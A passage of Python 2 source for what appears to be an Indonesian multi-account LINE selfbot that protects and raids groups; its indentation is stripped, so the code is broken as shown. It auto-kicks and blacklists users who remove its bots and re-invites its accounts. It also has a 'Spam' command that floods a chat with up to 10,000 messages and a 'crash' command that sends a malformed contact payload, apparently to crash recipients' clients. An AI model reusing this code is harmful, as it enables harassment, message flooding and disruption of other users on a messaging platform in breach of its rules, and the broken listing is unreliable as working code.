if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = kk.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
ks.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
X = kc.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = ks.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if admin in op.param3: #Admin ke Kick
if op.param2 in admin:
pass
if op.param3 in admin:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
random.choice(DEF).getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin and owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "c33b66e4b7709e54a6fe6eced6e57c157',"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Cv2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'Kr restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
